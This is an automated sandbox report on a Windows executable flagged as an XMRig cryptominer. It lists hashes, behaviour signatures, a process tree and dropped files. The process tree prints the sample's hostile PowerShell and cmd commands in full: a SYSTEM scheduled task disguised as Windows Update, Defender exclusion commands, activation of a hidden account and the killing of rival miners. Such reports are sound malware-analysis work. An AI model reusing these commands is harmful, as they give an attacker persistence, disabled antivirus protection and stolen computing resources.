Overview

overview

10

Static

static

10

1f1f27deff...18.exe

windows7-x64

10

1f1f27deff...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-03-2024 10:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe

  • Size

    5.2MB

  • MD5

    1f1f27deffe539d99e12d720f1fbd7da

  • SHA1

    a021497f416dded6636e88d8955a3a7632fbfcf2

  • SHA256

    7ece8e0973bdd09081b496e90d84e88152a60bfdd98123372fc3aed1c9d49863

  • SHA512

    2c4f8b7cf581a3ca57d7463e410a9f58bb484fef0708f15106db4c1601ebda739eef5bde96bad48e38367d53637a3deac94443d6fbf8b3d907b8838e054b1522

  • SSDEEP

    98304:5L6uEe3WyV1kpTAuLz2LgdOnV5N2Vv9Pe11dHO2:5oe3Wy/qEuLz20ne1DHO2

Score
10/10
xmrigminerpersistence

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 2 IoCs
    miner
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in System32 directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 15 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3048
    • C:\Windows\SYSTEM32\whoami.exe
      whoami /priv
      2⤵
        PID:3672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" "net user Defaultaccount /active:yes"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4396
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" user Defaultaccount /active:yes
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5000
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user Defaultaccount /active:yes
            4⤵
              PID:4956
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4812
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "$getdate = (get-date).AddMinutes(1).ToString('HH:mm:ss');$trigger = New-ScheduledTaskTrigger -Daily -DaysInterval 1 -RandomDelay '00:00' -At $getdate; $Trigger.Repetition = $(New-ScheduledTaskTrigger -Once -RandomDelay '00:0' -At $getdate -RepetitionDuration (New-TimeSpan -Days 9000) -RepetitionInterval '00:10').Repetition;$User= 'NT AUTHORITY\SYSTEM';$Action= New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument 'C:\Users\Administrator\Appdata\Local\Temp\Windows\StartDown.vbs';Register-ScheduledTask -TaskName 'wuaserv' -Description 'Windows Update Service' -Trigger $Trigger -User $User -Action $Action -RunLevel Highest -Force -ErrorAction SilentlyContinue"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3896
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "Add-MpPreference -ExclusionPath C:\Users\Administrator\Appdata\Local\Temp\Windows"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4924
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "Set-MpPreference -ExclusionProcess zxmcjdm.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3012
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5076
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd" "/c taskkill /im zzmsahbg.exe /f"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3468
          • C:\Windows\system32\taskkill.exe
            taskkill /im zzmsahbg.exe /f"
            3⤵
            • Kills process with taskkill
            PID:2976
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd" "/c taskkill /im xmr-stak.exe /f"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3444
          • C:\Windows\system32\taskkill.exe
            taskkill /im xmr-stak.exe /f"
            3⤵
            • Kills process with taskkill
            PID:3960
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd" "/c taskkill /im asmhfn.exe /f"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4964
          • C:\Windows\system32\taskkill.exe
            taskkill /im asmhfn.exe /f"
            3⤵
            • Kills process with taskkill
            PID:3172
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd" "/c taskkill /im pamguam.exe /f"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1548
          • C:\Windows\system32\taskkill.exe
            taskkill /im pamguam.exe /f"
            3⤵
            • Kills process with taskkill
            PID:2580
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd" "/c taskkill /im xmrig.exe /f"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1396
          • C:\Windows\system32\taskkill.exe
            taskkill /im xmrig.exe /f"
            3⤵
            • Kills process with taskkill
            PID:2964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "(Get-Process | Where-Object {$_.Name -eq 'zxmcjdm'}).count"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1884
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "start-process C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe -WindowStyle hidden"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2944
          • C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe
            "C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe"
            3⤵
            • Executes dropped EXE
            PID:4128
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3004
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd" "/c taskkill /im zzmsahbg.exe /f"
          2⤵
            PID:3444
            • C:\Windows\system32\taskkill.exe
              taskkill /im zzmsahbg.exe /f"
              3⤵
              • Kills process with taskkill
              PID:5100
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd" "/c taskkill /im xmr-stak.exe /f"
            2⤵
              PID:544
              • C:\Windows\system32\taskkill.exe
                taskkill /im xmr-stak.exe /f"
                3⤵
                • Kills process with taskkill
                PID:1576
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd" "/c taskkill /im asmhfn.exe /f"
              2⤵
                PID:1548
                • C:\Windows\system32\taskkill.exe
                  taskkill /im asmhfn.exe /f"
                  3⤵
                  • Kills process with taskkill
                  PID:3012
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd" "/c taskkill /im pamguam.exe /f"
                2⤵
                  PID:4772
                  • C:\Windows\system32\taskkill.exe
                    taskkill /im pamguam.exe /f"
                    3⤵
                    • Kills process with taskkill
                    PID:1884
                • C:\Windows\SYSTEM32\cmd.exe
                  "cmd" "/c taskkill /im xmrig.exe /f"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1396
                  • C:\Windows\system32\taskkill.exe
                    taskkill /im xmrig.exe /f"
                    3⤵
                    • Kills process with taskkill
                    PID:736
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" "(Get-Process | Where-Object {$_.Name -eq 'zxmcjdm'}).count"
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1284
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4400
                • C:\Windows\SYSTEM32\cmd.exe
                  "cmd" "/c taskkill /im zzmsahbg.exe /f"
                  2⤵
                    PID:1188
                    • C:\Windows\system32\taskkill.exe
                      taskkill /im zzmsahbg.exe /f"
                      3⤵
                      • Kills process with taskkill
                      PID:2568
                  • C:\Windows\SYSTEM32\cmd.exe
                    "cmd" "/c taskkill /im xmr-stak.exe /f"
                    2⤵
                      PID:1644
                      • C:\Windows\system32\taskkill.exe
                        taskkill /im xmr-stak.exe /f"
                        3⤵
                        • Kills process with taskkill
                        PID:404
                    • C:\Windows\SYSTEM32\cmd.exe
                      "cmd" "/c taskkill /im asmhfn.exe /f"
                      2⤵
                        PID:2628
                        • C:\Windows\system32\taskkill.exe
                          taskkill /im asmhfn.exe /f"
                          3⤵
                          • Kills process with taskkill
                          PID:2012
                      • C:\Windows\SYSTEM32\cmd.exe
                        "cmd" "/c taskkill /im pamguam.exe /f"
                        2⤵
                          PID:4432
                          • C:\Windows\system32\taskkill.exe
                            taskkill /im pamguam.exe /f"
                            3⤵
                            • Kills process with taskkill
                            PID:1964
                        • C:\Windows\SYSTEM32\cmd.exe
                          "cmd" "/c taskkill /im xmrig.exe /f"
                          2⤵
                            PID:4012
                            • C:\Windows\system32\taskkill.exe
                              taskkill /im xmrig.exe /f"
                              3⤵
                              • Kills process with taskkill
                              PID:2388
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" "(Get-Process | Where-Object {$_.Name -eq 'zxmcjdm'}).count"
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1044
                        • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
                          PowerShell.exe C:\Users\Administrator\Appdata\Local\Temp\Windows\StartDown.vbs
                          1⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:3684
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Administrator\Appdata\Local\Temp\Windows\StartDown.vbs"
                            2⤵
                            • Modifies data under HKEY_USERS
                            • Suspicious use of WriteProcessMemory
                            PID:4552
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -exec bypass -command "C:\Users\Administrator\AppData\Local\Temp\Windows\UntitledOnPriv.ps1"
                              3⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3524

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                          Filesize

                          2KB

                          MD5

                          440cb38dbee06645cc8b74d51f6e5f71

                          SHA1

                          d7e61da91dc4502e9ae83281b88c1e48584edb7c

                          SHA256

                          8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

                          SHA512

                          3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_14lxs5yy.4dl.ps1
                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          Download Submit

                        • C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          88db94ed708224b98985e80c0c361ace

                          SHA1

                          58b9badd68cc571725fa0d34ebb2dd210167910e

                          SHA256

                          45eecdd95367835d8823ae8aac28f3a2a7b1b2a1f5c8501637a76bf5fe4d413d

                          SHA512

                          f7aa11faaf75d54a6e77bf2b0ebe8db1b6a247917c3d0cc4a616dd93fec8392ed93900e4e50be80ec05f9188b5e2f819e78537bae03aa1fe00778e4da232bf7d

                          Download Submit

                        • C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          2624b15fb15001d9a59ba771f3b8b9b8

                          SHA1

                          40d466ffe8ecf9941024a1ef3c9260e6c82910ed

                          SHA256

                          0217e1913a09eec1f81cc2d462a00d5fbc8283b186c6d6c94d6f085540d3d9af

                          SHA512

                          8662fc03d20be28f82faf11702ae2a0bb62ae910b7cd276f8f28bc8813957b8fad2f9c06284b4f867714b9fb215dedef89879e60e2bbb85ad19f2d45a35222a9

                          Download Submit

                        • C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          8974419dc85c44356fdd6532bd6f6d64

                          SHA1

                          c186be5888759ca2a9dc8c99382ddd798bbda0c1

                          SHA256

                          3be38347a56e4039c99eac1f6fe35a6d0484d7c11cc7074bc29ac188c5263e66

                          SHA512

                          549c71771a506d28b3dd4b2d57393959dffa9ce58950347335f48b5edce0ac9d4b03df13d3e4c11a4e04af48de0e1f1f51a8dc7baa07f747447040ab2d52f12e

                          Download Submit

                        • C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          190cc2feb6fbf6a6143f296ebe043de5

                          SHA1

                          8fa72a99c46ed77b602476c85ca2d8ea251b22fb

                          SHA256

                          4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206

                          SHA512

                          94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616

                          Download Submit

                        • C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          e039a9c856e8f1a36872dc5b550f7b75

                          SHA1

                          d7b8ff279e0df3b2e822828004649778a7c95024

                          SHA256

                          71e5712d75558d4ce64f4eb37df72d0e2fe88c87aceba90aa10c672dcc3943cb

                          SHA512

                          19484391612f621c307aa736537be552d9d3672c6ba8ed7d550989831b574499ac7857d0339e9f83a5fbf97c34c21b27966decc367950193e58cce2eaff013a1

                          Download Submit

                        • C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          e0cfecee32d6c3b3077518534d3b760a

                          SHA1

                          706e3db1a55accaf7dfa9c4e87bde81cb3753d8d

                          SHA256

                          bbf44fe2b1447b1a669ec71d8a1c7458e62e6eae2be7ce4c2647e2cc77e6d92b

                          SHA512

                          e4e22a8290542adfb8fcd32e489197ea07feb8657d631a3023ba67908318c63133d7c7cb68b3c4f5f0e4b820859e376ed7074fbdb95e10ef1646f0537c75ad61

                          Download Submit

                        • C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          77d1d4eea371373475c9741ccf519756

                          SHA1

                          098408ff8108285165879165dde0e6350ea5cfdf

                          SHA256

                          5b6a87ed34a378ba7b0d4d269c89c88b19d82ae61c36c34f6fd86d838dca4e65

                          SHA512

                          f1fbb1960ff00bc9f933651dbf449d4852a02e719d1882d25e9fe4352f1a8fbf504a6ec6471d1de8b4579dcb815f8798b49d2f023704e0a78cfde355dfc20c6e

                          Download Submit

                        • C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          38626e78f952256a721176512a7f8c26

                          SHA1

                          70636067d2b0ec031d6912faba82a8665fa54a08

                          SHA256

                          ce79b9265cd36fec49cda6c92664354a8b6448bcf28bc13ff8b318b3b80c756d

                          SHA512

                          49005e71061285d59144a8551bb9b317694a64b383c64ec6e3c34308371a95b8fbac7356c2a8eb15477030f9aee10b347bca4f95601ba4b262eb3df0ec22c0d2

                          Download Submit

                        • C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          2238871af228384f4b8cdc65117ba9f1

                          SHA1

                          2a200725f1f32e5a12546aa7fd7a8c5906757bd1

                          SHA256

                          daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882

                          SHA512

                          1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

                          Download Submit

                        • C:\Users\Administrator\AppData\Local\Temp\Windows\UntitledOnPriv.ps1
                          Filesize

                          1KB

                          MD5

                          8c0ecf1cadaca4fb96b6584e07e7647b

                          SHA1

                          69720f44315317f5668173b9ae15778e24828a6a

                          SHA256

                          a460c86a6e9957592467f0b48506991345b323cadf7fec245324f145b2cc360b

                          SHA512

                          c19539ae46e41810ec55d58fb394a44467f94950539f5bdf8e8f0f03113dbd61414762084b056dbdecc8a5a465112d5f2ea705abe93ff67bdb656349aca633b1

                          Download Submit

                        • C:\Users\Administrator\Appdata\Local\Temp\Windows\StartDown.vbs
                          Filesize

                          191B

                          MD5

                          83937ff15cafd9ac49a2f9b32f7438d2

                          SHA1

                          04fa7a3ee77949a02b378b793f430ac5e74cb4b6

                          SHA256

                          791cec11251c859688336e3a1f89027d3316df219c4203b85d383da56b0a8472

                          SHA512

                          2434197130a4abc0a4b846d96ee0f4601e322984d5a8fc66c6fee6e9b26d105f0bf51bfb560c398791db98272f92b7b761e133f7b04ba5c49d8b5ac8ee94cc4c

                          Download Submit

                        • C:\Users\Administrator\Appdata\Local\Temp\Windows\Windows_Defender.exe
                          Filesize

                          5.2MB

                          MD5

                          1f1f27deffe539d99e12d720f1fbd7da

                          SHA1

                          a021497f416dded6636e88d8955a3a7632fbfcf2

                          SHA256

                          7ece8e0973bdd09081b496e90d84e88152a60bfdd98123372fc3aed1c9d49863

                          SHA512

                          2c4f8b7cf581a3ca57d7463e410a9f58bb484fef0708f15106db4c1601ebda739eef5bde96bad48e38367d53637a3deac94443d6fbf8b3d907b8838e054b1522

                          Download Submit

                        • C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe
                          Filesize

                          3.1MB

                          MD5

                          94484839cf6f9765088e03271330ef26

                          SHA1

                          a9417b34c5d13354bd61b950142f47d7b92db6c1

                          SHA256

                          a7b71f6801c97c20677b4f5f54f77e69eb05108dc38ab67ac81a19338dfb3a65

                          SHA512

                          c434246af68785db332019ef0aac9e90678d9ca94c1ca9bf2a65a08803854843eae5e1da1b53565af831f3f20f54d24b0c7592c34535ad0888ee2c2e44149ac0

                          Download Submit

                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                          Download Submit

                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          64B

                          MD5

                          446dd1cf97eaba21cf14d03aebc79f27

                          SHA1

                          36e4cc7367e0c7b40f4a8ace272941ea46373799

                          SHA256

                          a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                          SHA512

                          a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                          Download Submit

                        • memory/1284-243-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/1284-244-0x00000252C6E30000-0x00000252C6E40000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/1884-145-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/1884-151-0x0000020CB1360000-0x0000020CB1370000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/1884-157-0x0000020CB1360000-0x0000020CB1370000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/1884-160-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/2944-172-0x0000021D3F3F0000-0x0000021D3F400000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/2944-177-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/2944-162-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3004-238-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3004-241-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3012-120-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3012-84-0x000002217F5F0000-0x000002217F60C000-memory.dmp

                          Filesize

                          112KB

                          Download

                        • memory/3012-110-0x000002217F840000-0x000002217F85C000-memory.dmp

                          Filesize

                          112KB

                          Download

                        • memory/3012-112-0x000002217F880000-0x000002217F89A000-memory.dmp

                          Filesize

                          104KB

                          Download

                        • memory/3012-114-0x000002217F830000-0x000002217F838000-memory.dmp

                          Filesize

                          32KB

                          Download

                        • memory/3012-115-0x000002217F860000-0x000002217F866000-memory.dmp

                          Filesize

                          24KB

                          Download

                        • memory/3012-116-0x000002217F870000-0x000002217F87A000-memory.dmp

                          Filesize

                          40KB

                          Download

                        • memory/3012-117-0x000002217D170000-0x000002217D180000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3012-39-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3012-40-0x000002217D170000-0x000002217D180000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3012-74-0x000002217D170000-0x000002217D180000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3012-111-0x000002217F820000-0x000002217F82A000-memory.dmp

                          Filesize

                          40KB

                          Download

                        • memory/3012-85-0x00007FF4EDC00000-0x00007FF4EDC10000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3012-95-0x000002217D170000-0x000002217D180000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3524-208-0x0000017CF1500000-0x0000017CF1510000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3524-207-0x0000017CF1500000-0x0000017CF1510000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3524-206-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3524-224-0x0000017CF1500000-0x0000017CF1510000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3524-226-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3684-193-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3684-199-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3684-194-0x0000019065960000-0x0000019065970000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3896-125-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3896-118-0x00000297CC550000-0x00000297CC560000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3896-42-0x00000297CC550000-0x00000297CC560000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3896-41-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/3896-60-0x00000297CC550000-0x00000297CC560000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3896-97-0x00007FF48DC50000-0x00007FF48DC60000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3896-96-0x00000297E7000000-0x00000297E70B5000-memory.dmp

                          Filesize

                          724KB

                          Download

                        • memory/3896-98-0x00000297E6DB0000-0x00000297E6DBA000-memory.dmp

                          Filesize

                          40KB

                          Download

                        • memory/3896-113-0x00000297CC550000-0x00000297CC560000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/4128-181-0x0000026199800000-0x0000026199804000-memory.dmp

                          Filesize

                          16KB

                          Download

                        • memory/4128-183-0x00000261997E0000-0x00000261997E4000-memory.dmp

                          Filesize

                          16KB

                          Download

                        • memory/4128-178-0x00000261997C0000-0x00000261997D0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/4128-182-0x0000026199810000-0x0000026199814000-memory.dmp

                          Filesize

                          16KB

                          Download

                        • memory/4128-179-0x00000261997D0000-0x00000261997D4000-memory.dmp

                          Filesize

                          16KB

                          Download

                        • memory/4128-180-0x00000261997E0000-0x00000261997E4000-memory.dmp

                          Filesize

                          16KB

                          Download

                        • memory/4396-6-0x00007FFBD9ED0000-0x00007FFBDA991000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/4396-11-0x000001EC55790000-0x000001EC557A0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/4396-0-0x000001EC57880000-0x000001EC578A2000-memory.dmp

                          Filesize

                          136KB

                          Download

                        • memory/4396-12-0x000001EC55790000-0x000001EC557A0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/4396-15-0x00007FFBD9ED0000-0x00007FFBDA991000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/4812-36-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/4812-27-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/4812-32-0x0000028F3DC00000-0x0000028F3DC10000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/4812-33-0x0000028F3DC00000-0x0000028F3DC10000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/4924-108-0x00007FF43CD00000-0x00007FF43CD10000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/4924-126-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/4924-72-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/4924-73-0x00000297DB0F0000-0x00000297DB100000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/4924-109-0x00000297DB0F0000-0x00000297DB100000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/5076-139-0x00000227741E0000-0x00000227741F0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/5076-133-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/5076-142-0x00007FFBD8F10000-0x00007FFBD99D1000-memory.dmp

                          Filesize

                          10.8MB

                          Download